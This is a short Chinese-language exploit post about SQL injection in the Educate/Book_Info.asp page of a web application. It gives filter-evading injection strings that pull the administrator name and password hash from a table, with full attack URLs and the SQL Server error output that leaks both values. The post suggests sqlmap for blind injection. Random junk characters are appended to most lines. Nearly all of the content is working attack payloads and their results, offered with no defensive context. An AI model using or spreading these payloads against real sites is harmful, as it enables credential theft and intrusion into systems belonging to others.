漏洞出现在Educate/Book_Info.asp5 G& c9 t& S% b/ W9 P$ m
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
/ X0 t. a; m& \exp:如下
+ n( p6 j- M# G查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 Q7 L* c2 ?# o5 e
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)5 u2 z+ p% A7 T+ a
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
$ T. T4 z3 n6 Y+ F8 T3 B' hMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'+ F0 ~+ b8 i7 v
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。- m/ M8 x! c( V, d3 J- H, q
/Educate/Book_Info.asp,行 8
. w j6 W- v) T0 M3 C: f+ w3 }http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% L5 t! L2 h. p0 bMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
, r$ t' \5 p+ B. C将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% }# y k @4 v, v/ Q
/Educate/Book_Info.asp,行 8 |